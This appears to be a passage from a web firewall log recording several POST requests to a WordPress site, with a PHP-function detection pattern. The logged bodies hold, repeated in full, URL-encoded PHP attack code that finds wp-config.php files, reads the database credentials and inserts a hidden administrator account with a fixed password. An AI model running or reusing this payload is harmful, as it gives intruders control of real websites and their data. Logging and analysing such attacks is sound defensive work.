%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvL2pvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWdqKA0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.64 Safari\/537.36 Edg\/101.0.1210.47\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Microsoft Edge\";v=\"101\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-user:?1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-length:12640\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-fetch-dest:document\n\ncg=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:05:26","213.209.159.254","POST","\/wp-admin\/site-health.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Lw:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/site-health.php HTTP\/1.1\ncookie:4=3a8677dc156d672c6e12f16237adcc36; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvGUpvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWypKIyp3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12640\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nLw=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%